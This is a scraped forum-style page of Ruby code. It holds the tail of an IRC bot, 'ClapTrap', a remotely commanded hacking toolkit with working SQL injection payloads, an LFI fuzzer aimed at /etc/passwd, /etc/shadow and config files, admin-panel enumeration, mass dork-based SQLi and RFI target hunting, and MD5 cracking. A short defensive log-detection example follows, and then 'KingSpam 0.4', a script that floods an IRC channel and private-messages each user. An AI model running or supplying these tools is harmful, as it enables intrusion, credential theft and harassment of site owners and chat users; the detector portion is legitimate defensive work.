resultado = resultado + "[+] State or Region : " + $2+ "\n " ;
else
resultado = resultado + "[+] State of Region : Not Found\n "
end
resultado = resultado + "\n [+] Getting DNS ...\n \n "
control = "0"
code = toma( "http://www.ip-adress.com/reverse_ip/" + ip)
dnss = code.scan ( / whois\/ ( .* ?) \">Whois/)
dnss.flatten.each do |dns|
begin
if dns != " "
control = " 1 "
resultado = resultado + " [ + ] DNS Found : "+dns
end
end
end
if control==" 0 "
resultado = resultado + " \n[ - ] DNS Not Found\n"
end
return resultado
end
def details(url,by)
pass1,pass2 = bypass(by)
resultado = " "
hextest = " 0x2f6574632f706173737764" #/etc/passwd
hextest = " 0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
web1 = url.sub(/hackman/," 0x4b30425241")
web2 = url.sub(/hackman/," concat( 0x4b30425241,user( ) ,0x4b30425241,database( ) ,0x4b30425241,version( ) ,0x4b30425241) ")
web3 = url.sub(/hackman/," unhex( hex( concat( char( 69 ,82 ,84 ,79 ,82 ,56 ,53 ,52 ) ,load_file( "+hextest+" ) ) ) ) ")
resultado = resultado + " \n[ + ] Extracting information of the DB\n"
code1 = toma(web2)
if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
user,data,ver = $1,$2,$3
resultado = resultado + " \n[ + ] Username : "+user
resultado = resultado + " \n[ + ] Database : "+data
resultado = resultado + " \n[ + ] Version : "+ver+" \n\n"
else
resultado = resultado + " [ - ] Not Found\n"
end
code2 = toma(web1+pass1+" from"+pass1+" mysql.user "+pass2)
code3 = toma(web1+pass1+" from"+pass1+" information_schema.tables "+pass2)
code4 = toma(web3)
if code2=~/K0BRA/
resultado = resultado + " [ + ] Mysql User : ON\n"
end
if code3=~/K0BRA/
resultado = resultado + " [ + ] information_schema : ON\n"
end
if code4=~/ERTOR854/
resultado = resultado + " [ + ] load_file : ON\n"
end
return resultado
end
def findlength(url,by)
pass1,pass2 = bypass(by)
z = " 1 "
control = " 0 "
resultado = " "
resultado = resultado + " \n[ + ] Finding columns lenght ...\n\n"
x = " concat( 0x4b30425241,1 ,0x4b30425241) "
for num in ('2'..'25')
z = z+" ,"+num
x= x+" ,"+" concat( 0x4b30425241,"+num+" ,0x4b30425241) "
code = toma(url+" 1 "+pass1+" and "+pass1+" 1 =0 "+pass1+" union"+pass1+" select "+pass1+x)
if code=~/K0BRA(.*?)K0BRA/
resultado = resultado + " [ + ] The Page has "+num+" columns\n"
resultado = resultado + " [ + ] The number "+$1+" print data\n"
z = z.sub($1," hackman")
sqli = url+" 1 "+pass1+" and "+pass1+" 1 =0 "+pass1+" union"+pass1+" select "+pass1+z
control = " 1 "
break
end
end
if control != " 1 "
resultado = resultado + " [ - ] Columns lenght not found\n"
end
return resultado,sqli,control
end
def scanner_sqli(page,by)
pass1,pass2 = bypass(by)
resultado = " "
rta1 = " "
rta2 = " "
resultado = resultado + " [ + ] Testing vulnerability ...\n\n"
codeuno = toma(page+" 1 "+pass1+" and "+pass1+" 1 =0 "+pass2)
codedos = toma(page+" 1 "+pass1+" and "+pass1+" 1 =1 "+pass2)
if codeuno != codedos
resultado = resultado + " [ + ] Vulnerable !\n"
rta1,sqli,control = findlength(page,by)
if control==" 1 "
rta2 = details(sqli," -- ")
end
else
resultado = resultado + " [ - ] Not Vulnerable\n"
end
resultado = resultado + rta1 + rta2
return resultado
end
def scanner_lfi(web)
resultado = " "
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/
lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\P rogramFiles\A pacheGroup\A pache\l ogs\a ccess.log','C:\P rogramFiles\A pacheGroup\A pache\l ogs\e rror.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
resultado = resultado + " [ + ] Testing the vulnerability LFI...\n\n"
code = toma(web+" '")
if code=~/No such file or directory in <b>(.*)<\/ b> on line/
fpd = $1
resultado = resultado + "[+] LFI Detected\n \n "
resultado = resultado + "[Full Path Discloure]: "+fpd+"\n "
resultado = resultado + "\n [+] Fuzzing Files\n \n "
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
resultado= resultado + "[Link] : "+web+file+"\n "
end
end
resultado = resultado + "\n [+] Done\n "
else
resultado = resultado + "[-] Not Vulnerable to LFI\n \n "
end
return resultado
end
def scanner_panel(page)
resultado = ""
panels = [' admin/ admin.asp ',' admin/ login.asp ',' admin/ index.asp ',' admin/ admin.aspx ',' admin/ login.aspx ',' admin/ index.aspx ',' admin/ webmaster.asp ',' admin/ webmaster.aspx ',' asp/ admin/ index.asp ',' asp/ admin/ index.aspx ',' asp/ admin/ admin.asp ',' asp/ admin/ admin.aspx ',' asp/ admin/ webmaster.asp ',' asp/ admin/ webmaster.aspx ',' admin/ ',' login.asp ',' login.aspx ',' admin.asp ',' admin.aspx ',' webmaster.aspx ',' webmaster.asp ',' login/ index.asp ',' login/ index.aspx ',' login/ login.asp ',' login/ login.aspx ',' login/ admin.asp ',' login/ admin.aspx ',' administracion/ index.asp ',' administracion/ index.aspx ',' administracion/ login.asp ',' administracion/ login.aspx ',' administracion/ webmaster.asp ',' administracion/ webmaster.aspx ',' administracion/ admin.asp ',' administracion/ admin.aspx ',' php/ admin/ ',' admin/ admin.php ',' admin/ index.php ',' admin/ login.php ',' admin/ system .php ',' admin/ ingresar.php ',' admin/ administrador.php ',' admin/ default.php ',' administracion/ ',' administracion/ index.php ',' administracion/ login.php ',' administracion/ ingresar.php ',' administracion/ admin.php ',' administration/ ',' administration/ index.php ',' administration/ login.php ',' administrator/ index.php ',' administrator/ login.php ',' administrator/ system .php ',' system / ',' system / login.php ',' admin.php ',' login.php ',' administrador.php ',' administration.php ',' administrator.php ',' admin1.html ',' admin1.php ',' admin2.php ',' admin2.html ',' yonetim.php ',' yonetim.html ',' yonetici.php ',' yonetici.html ',' adm/ ',' admin/ account.php ',' admin/ account.html ',' admin/ index.html ',' admin/ login.html ',' admin/ home.php ',' admin/ controlpanel.html ',' admin/ controlpanel.php ',' admin.html ',' admin/ cp.php ',' admin/ cp.html ',' cp.php ',' cp.html ',' administrator/ ',' administrator/ index.html ',' administrator/ login.html ',' administrator/ account.html ',' administrator/ account.php ',' 
administrator.html ',' login.html ',' modelsearch/ login.php ',' moderator.php ',' moderator.html ',' moderator/ login.php ',' moderator/ login.html ',' moderator/ admin.php ',' moderator/ admin.html ',' moderator/ ',' account.php ',' account.html ',' controlpanel/ ',' controlpanel.php ',' controlpanel.html ',' admincontrol.php ',' admincontrol.html ',' adminpanel.php ',' adminpanel.html ',' admin1.asp ',' admin2.asp ',' yonetim.asp ',' yonetici.asp ',' admin/ account.asp ',' admin/ home.asp ',' admin/ controlpanel.asp ',' admin/ cp.asp ',' cp.asp ',' administrator/ index.asp ',' administrator/ login.asp ',' administrator/ account.asp ',' administrator.asp ',' modelsearch/ login.asp ',' moderator.asp ',' moderator/ login.asp ',' moderator/ admin.asp ',' account.asp ',' controlpanel.asp ',' admincontrol.asp ',' adminpanel.asp ',' fileadmin/ ',' fileadmin.php ',' fileadmin.asp ',' fileadmin.html ',' administration.html ',' sysadmin.php ',' sysadmin.html ',' phpmyadmin/ ',' myadmin/ ',' sysadmin.asp ',' sysadmin/ ',' ur- admin.asp ',' ur- admin.php ',' ur- admin.html ',' ur- admin/ ',' Server.php ',' Server.html ',' Server.asp ',' Server/ ',' wp- admin/ ',' administr8.php ',' administr8.html ',' administr8/ ',' administr8.asp ',' webadmin/ ',' webadmin.php ',' webadmin.asp ',' webadmin.html ',' administratie/ ',' admins/ ',' admins.php ',' admins.asp ',' admins.html ',' administrivia/ ',' Database_Administration/ ',' WebAdmin/ ',' useradmin/ ',' sysadmins/ ',' admin1/ ',' system- administration/ ',' administrators/ ',' pgadmin/ ',' directadmin/ ',' staradmin/ ',' ServerAdministrator/ ',' SysAdmin/ ',' administer/ ',' LiveUser_Admin/ ',' sys- admin/ ',' typo3/ ',' panel/ ',' cpanel/ ',' cPanel/ ',' cpanel_file/ ',' platz_login/ ',' rcLogin/ ',' blogindex/ ',' formslogin/ ',' autologin/ ',' support_login/ ',' meta_login/ ',' manuallogin/ ',' simpleLogin/ ',' loginflat/ ',' utility_login/ ',' showlogin/ ',' memlogin/ ',' members/ ',' login- redirect/ ',' sub- login/ ',' 
wp- login/ ',' login1/ ',' dir- login/ ',' login_db/ ',' xlogin/ ',' smblogin/ ',' customer_login/ ',' UserLogin/ ',' login- us/ ',' acct_login/ ',' admin_area/ ',' bigadmin/ ',' project- admins/ ',' phppgadmin/ ',' pureadmin/ ',' sql- admin/ ',' radmind/ ',' openvpnadmin/ ',' wizmysqladmin/ ',' vadmind/ ',' ezsqliteadmin/ ',' hpwebjetadmin/ ',' newsadmin/ ',' adminpro/ ',' Lotus_Domino_Admin/ ',' bbadmin/ ',' vmailadmin/ ',' Indy_admin/ ',' ccp14admin/ ',' irc- macadmin/ ',' banneradmin/ ',' sshadmin/ ',' phpldapadmin/ ',' macadmin/ ',' administratoraccounts/ ',' admin4_account/ ',' admin4_colon/ ',' radmind- 1 / ',' Super- Admin/ ',' AdminTools/ ',' cmsadmin/ ',' SysAdmin2/ ',' globes_admin/ ',' cadmins/ ',' phpSQLiteAdmin/ ',' navSiteAdmin/ ',' server_admin_small/ ',' logo_sysadmin/ ',' server/ ',' database_administration/ ',' power_user/ ',' system_administration/ ',' ss_vms_admin_sm/ ']
resultado = resultado + "[+] Scanning ...\n \n "
control = "0"
panels.each do |panel|
begin
url = page+"/"+panel
status_code = response_code(url)
if status_code=="200"
resultado = resultado + "[+] Link : "+url+"\n "
control = "1"
end
end
end
if control=="1"
resultado = resultado + "\n [+] Done\n "
else
resultado = resultado + "\n [-] Not Found\n "
end
return resultado
end
def get_httpfinger(page)
resultado = ""
resultado = resultado + "[+] Searching ...\n \n "
resultado = resultado + httpfinger(page)
return resultado
end
def crack_md5(md5)
resultado = ""
resultado = resultado + "[+] Cracking ...\n \n "
code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
if code=~/pass : <b>(.*?)<\/ b>/
password = $1
resultado = resultado + "[+] md5online.net -> "+password+"\n "
else
resultado = resultado + "[-] md5online.net -> Not Found" + "\n "
end
code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
if code=~/<span class=' middle_title'>Hashed string<\/ span>: (.*?)<\/ div>/
password = $1
resultado = resultado + "[+] md5.my-addr.co -> "+password+"\n "
else
resultado = resultado + "[-] md5.my-addr.co -> Not Found" +"\n "
end
code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
if code=~/Decrypted Text: <\/ b>(.*?)<\/ font>/
password = $1
resultado = resultado + "[+] md5decryption.com -> "+password+"\n "
else
resultado = resultado + "[-] md5decryption.com -> Not Found"+"\n "
end
return resultado
end
def tiny_url(page)
resultado = ""
code = toma("http://tinyurl.com/api-create.php?url="+page)
if code=~/http/
resultado = resultado + "[+] Link : "+code
else
resultado = resultado + "[-] Error"
end
return resultado
end
def codificar_hex(text)
return "[+] Result : "+encode_hex(text)
end
def decodificar_hex(text)
return "[+] Result : "+decode_hex(text)
end
def codificar_base64(text)
return "[+] Result : "+Base64.encode64(text).chomp
end
def decodificar_base64(text)
return "[+] Result : "+Base64.decode64(text).chomp
end
def codificar_ascii(text)
resultado = ""
resultado = resultado + "[+] Result : "+text.split("").map(&:ord).to_s
return resultado
end
def md5_encode(text)
return "[+] Result : "+Digest::MD5.hexdigest(text).chomp
end
def scanner_dns(domain)
paths = ["www","www1","www2","www3","ftp","ns","mail","3com","aix","apache","back","bind","boreder","bsd","business","chains","cisco","content","corporate","cpv","dns","domino","dominoserver","download","e-mail","e-safe","email","esafe","external","extranet","firebox","firewall","front","fw","fw0","fwe","fw-1","firew","gate","gatekeeper","gateway","gauntlet","group","help","hop","hp","hpjet","hpux","http","https","hub","ibm","ids","info","inside","internal","internet","intranet","ipfw","irix","jet","list","lotus","lotusdomino","lotusnotes","lotusserver","mailfeed","mailgate","mailgateway","mailgroup","mailhost","maillist","mailpop","mailrelay","mimesweeper","ms","msproxy","mx","nameserver","news","newsdesk","newsfeed","newsgroup","newsroom","newsserver","nntp","notes","noteserver","notesserver","nt","outside","pix","pop","pop3","pophost","popmail","popserver","print","printer","private","proxy","proxyserver","public","qpop","raptor","read","redcreek","redhat","route","router","scanner","screen","screening","ecure","seek","smail","smap","smtp","smtpgateway","smtpgw","solaris","sonic","spool","squid","sun","sunos","suse","switch","transfer","trend","trendmicro","vlan","vpn","wall","web","webmail","webserver","webswitch","win2000","win2k","upload","file","fileserver","storage","backup","share","core","gw","wingate","main","noc","home","radius","security","access","dmz","domain","sql","mysql","mssql","postgres","db","database","imail","imap","exchange","sendmail","louts","test","logs","stage","staging","dev","devel","ppp","chat","irc","eng","admin","unix","linux","windows","apple","hp-ux","bigip","pc"]
resultado = ""
resultado = resultado + "[+] Searching DNS ...\n \n "
control = "0"
paths.each do |path|
begin
url = "http://"+path+"."+domain
status_code = response_code(url)
if status_code=="200"
resultado = resultado + "[+] Link : "+url+"\n "
control = "1"
end
end
end
if control=="1"
resultado = resultado + "\n [+] Done\n "
else
resultado = resultado + "\n [-] Not Found\n "
end
return resultado
end
def sqli_finder(dork,pages,opcion)
resultado = ""
if opcion=="bing"
resultado = resultado + "[+] Searching in Bing ...\n \n "
links = cortar(bing(dork,pages))
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n \n "
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found\n "
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
resultado = resultado + " [OK]\n "
else
resultado = resultado + " [FAIL]\n "
end
rescue
resultado = resultado + " [FAIL]\n "
end
end
resultado = resultado + "\n [+] Finished\n "
elsif opcion=="google"
resultado = resultado + "[+] Searching in Google ...\n \n "
links = cortar(google(dork,pages))
if links.count.to_s=="0"
resultado = resultado + "[+] Searching in Google again ...\n \n "
links = cortar(google_recursive(dork,pages))
end
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n \n "
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
resultado = resultado + " [OK]\n "
else
resultado = resultado + " [FAIL]\n "
end
rescue
resultado = resultado + " [FAIL]\n "
end
end
else
resultado = "[-] Bad Option"
end
return resultado
end
def rfi_finder(dork,pages,opcion)
resultado = ""
if opcion=="bing"
resultado = resultado + "[+] Searching in Bing ...\n \n "
links = cortar(bing(dork,pages))
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n \n "
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found\n "
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "http://www.supertangas.com/")
if url=~/Los mejores TANGAS de la red/i
resultado = resultado + " [OK]\n "
else
resultado = resultado + " [FAIL]\n "
end
rescue
resultado = resultado + " [FAIL]\n "
end
end
resultado = resultado + "\n [+] Finished\n "
elsif opcion=="google"
resultado = resultado + "[+] Searching in Google ...\n \n "
links = cortar(google(dork,pages))
if links.count.to_s=="0"
resultado = resultado + "[+] Searching in Google again ...\n \n "
links = cortar(google_recursive(dork,pages))
end
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n \n "
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "http://www.supertangas.com/")
if url=~/Los mejores TANGAS de la red/i
resultado = resultado + " [OK]\n "
else
resultado = resultado + " [FAIL]\n "
end
rescue
resultado = resultado + " [FAIL]\n "
end
end
else
resultado = "[-] Bad Option"
end
return resultado
end
#
def respuesta(to,texto)
resultado = texto.split("\n ")
resultado.flatten.each do |linea|
if linea != ""
$irc.print "PRIVMSG #{to} #{linea}\n "
sleep $timeout.to_i
end
end
end
def bot_online(host,port,canal,admin)
print "\n [+] Connecting ...\n "
begin
$irc = TCPSocket.open(host,port)
rescue
print "\n [-] Error connecting\n "
else
nick = "ClapTrap"
$irc.print "NICK "+nick+"\r \n "
$irc.print "USER "+nick+" 1 1 1 1\r \n "
$irc.print "JOIN #{canal}\r \n "
print "\n [+] Online\n "
while 1
code = $irc.recv(9999)
if code=~/PING (.*)/
$irc.print "PONG #{$1}\n "
end
if code=~/:(.*)!(.*) PRIVMSG (.*) :(.*)/
dedonde = $1
mensaje = $4
if dedonde==admin
if mensaje=~/!sqli (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,scanner_sqli(arg1,"--"))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!lfi (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,scanner_lfi(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!panel(.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,scanner_panel(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!fuzzdns (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,scanner_dns(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!locateip (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin, locateip(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!sqlifinder (.*) (.*) (.*)/
arg1 = $1
arg2 = $2
arg3 = $3
arg1 = arg1.chomp
arg2 = arg2.chomp
arg3 = arg3.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,sqli_finder(arg1,arg2,arg3))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!rfifinder (.*) (.*) (.*)/
arg1 = $1
arg1 = $2
arg1 = $3
arg1 = arg1.chomp
arg2 = arg2.chomp
arg3 = arg3.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,rfi_finder(arg1,arg2,arg3))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!crackit (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,crack_md5(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!tinyurl (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,tiny_url(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!httpfinger (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,get_httpfinger(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!md5 (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,md5_encode(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!base64 (.*) (.*)/
arg1 = $1
arg2 = $2
arg1 = arg1.chomp
arg2 = arg2.chomp
if arg2=="encode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,codificar_base64(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if arg2=="decode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,decodificar_base64(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
end
if mensaje=~/!hex (.*) (.*)/
arg1 = $1
arg2 = $2
arg1 = arg1.chomp
arg2 = arg2.chomp
if arg2=="encode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,codificar_hex(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if arg2=="decode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,decodificar_hex(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
end
if mensaje=~/!ascii (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,codificar_ascii(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!help/
about = ""
about = about + "Hi , I am ClapTrap an assistant robot programmed by Doddy Hackman in the year 2014" + "\n ";
about = about + "[++] Commands" + "\n ";
about = about + "[+] !help" + "\n ";
about = about + "[+] !locateip <web>" + "\n ";
about = about + "[+] !sqlifinder <dork> <count pages> <google/bing>" + "\n ";
about = about + "[+] !rfifinder <dork> <count pages> <google/bing>" + "\n ";
about = about + "[+] !panel <page>" + "\n ";
about = about + "[+] !fuzzdns <domain>" + "\n ";
about = about + "[+] !sqli <page>" + "\n ";
about = about + "[+] !lfi <page>" + "\n ";
about = about + "[+] !crackit <hash>" + "\n ";
about = about + "[+] !tinyurl <page>" + "\n ";
about = about + "[+] !httpfinger <page>" + "\n ";
about = about + "[+] !md5 <text>" + "\n ";
about = about + "[+] !base64 <encode/decode> <text>" + "\n ";
about = about + "[+] !ascii <encode/decode> <text>" + "\n ";
about = about + "[+] !hex <encode/decode> <text>" + "\n ";
about = about + "[++] Enjoy this IRC Bot" + "\n ";
respuesta(admin,about)
end
end
end
end
end
end
head()
print "[+] Host : "
host = gets.chomp
print "\n [+] Port : "
port = gets.chomp
print "\n [+] Channel : "
channel = gets.chomp
print "\n [+] Admin : "
admin = gets.chomp
bot_online(host,port,channel,admin)
copyright()
# The End ?
That's all.
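Added example, not part of the original post: a Ruby check that flags web access-log lines matching the request patterns hard-coded in the scanner functions above (the 0x4b30425241 / K0BRA delimiter, the char(69,82,...) load_file test, the union select probe, the LFI file list and the admin-panel path list). The log format, rule names, threshold and sample lines are assumptions constructed for the illustration.

```ruby
# Added example (not from the original post): flag access-log lines that match
# the request patterns hard-coded in the scanner functions above.
LOG_RE = /\A(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*" (\d{3})/

# Rules run against the normalized request target (see normalize).
RULES = {
  "sqli-k0bra-marker" => /0x4b30425241/,                    # hex of the K0BRA delimiter
  "sqli-loadfile"     => /char\(69,82,84,79,82,56,53,52\)/, # ERTOR854 load_file test
  "sqli-union"        => /unionselect/,
  "lfi-fuzz"          => %r{etc/(passwd|shadow)|boot\.ini|logs/(access|error)[._]log}
}.freeze

PANEL_RE = /admin|login|panel|webmaster|moderator|yonetim|yonetici/ # names from the panel list
PANEL_THRESHOLD = 5 # assumption: distinct panel-like 404s per client before alerting

# Undo URL encoding (twice, for double encoding), inline SQL comments,
# whitespace and case, so spacing tricks do not hide a signature.
def normalize(target)
  s = target.b.tr("+", " ")
  2.times { s = s.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr } }
  s.gsub(%r{/\*.*?\*/}, "").gsub(/\s+/, "").downcase
end

# Returns [client_ip, rule_name, detail] triples.
def scan(lines)
  alerts = []
  panel_misses = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    m = LOG_RE.match(line)
    next unless m
    ip, target, status = m[1], m[2], m[3]
    norm = normalize(target)
    RULES.each { |name, re| alerts << [ip, name, target] if norm =~ re }
    path = norm.split("?", 2).first.to_s
    panel_misses[ip] << path if status == "404" && path =~ PANEL_RE
  end
  panel_misses.each do |ip, paths|
    n = paths.uniq.size
    alerts << [ip, "panel-enumeration", "#{n} distinct paths"] if n >= PANEL_THRESHOLD
  end
  alerts
end

# Constructed sample log lines (documentation IP ranges, made-up paths).
TS = "[18/Dec/2015:21:41:00 +0000]"
SAMPLE_LOG = [
  %(192.0.2.10 - - #{TS} "GET /news.php?id=1+and+1=0+union+select+concat(0x4b30425241,1,0x4b30425241),2 HTTP/1.1" 200 512),
  %(192.0.2.10 - - #{TS} "GET /news.php?id=1%20UNION%2f**%2fSELECT%20concat(CHAR(69,82,84,79,82,56,53,52),1) HTTP/1.1" 200 498),
  %(198.51.100.7 - - #{TS} "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 1200),
  %(203.0.113.9 - - #{TS} "GET /login.php HTTP/1.1" 200 900)
] + %w[/admin/login.php /administrator/ /admin.asp /webmaster.aspx /cpanel/].map { |path|
  %(203.0.113.5 - - #{TS} "GET #{path} HTTP/1.1" 404 210)
}

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG).each { |alert| puts alert.join("  ") }
end
```

The fixed K0BRA and ERTOR854 markers are the most specific indicators here; the union and panel rules are generic and need tuning against normal traffic.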
49
Programming / Scripting / [Ruby] KingSpam 0.4
on: 18 September 2015, 16:49 pm
A simple Ruby script for spamming an IRC channel.
The code:
#!usr/bin/ruby
#KingSpam 0.4
#Coded By Doddy H
require "socket"
$nicks = [ "ruben" ,"negro jose" ,"rasputin" ,"juancho" ]
def head( )
print "\n \n == -- KingSpam 0.4 -- ==\n \n "
end
def uso( )
print "\n [+] Sintax : #{$0} <host> <channel> <spam list>\n "
end
def copyright( )
print "\n \n (C) Doddy Hackman 2012\n \n "
end
def read_file( file)
array = [ ]
File .open ( file, "r" ) do | lineas|
while ( linea = lineas.gets )
array .push ( linea)
end
end
return array
end
def load ( host,canal,spam_list)
print "\n [+] Connecting ...\n "
begin
irc = TCPSocket.open ( host,"6667" )
rescue
print "\n [-] Error\n "
else
lineas = read_file( spam_list)
nick_azar = $nicks [ rand ( $nicks.size ) ]
irc.print "NICK " + nick_azar+ "\r \n "
irc.print "USER " + nick_azar+ " 1 1 1 1\r \n "
irc.print "JOIN #{canal}\r \n "
print "\n [+] Online\n "
while 1
code = irc.recv ( 9999 )
#print code+"\n"
if code=~/ PING ( .* ) /
irc.print "PONG #{$1}\n "
end
if code=~/ :( .* ) 353 ( .* ) = ( .* ) :( .* ) /
nicks_found = $4
nicks = nicks_found.split ( " " )
end
print "\n [+] The party started\n \n "
while 1
sleep ( 20 ) # 1 minute
texto = lineas[ rand ( lineas.size ) ]
print "[+] Spamming channel #{canal}\n "
irc.print "PRIVMSG #{canal} #{texto}\n "
nicks.flatten .each do | nick|
if nick!=nick_azar
nick = nick.sub ( "+" ,"" )
nick = nick.sub ( "@" ,"" )
print "[+] Spam User : " + nick+ "\n "
irc.print "PRIVMSG #{nick} #{texto}\n "
end
end
end
end
end
end
head( )
host = ARGV[ 0 ]
canal = ARGV[ 1 ]
spam_list = ARGV[ 2 ]
if !host and !canal and !spam_list
uso( )
else
load ( host,canal,spam_list)
end
copyright( )
# The End ?
That's all.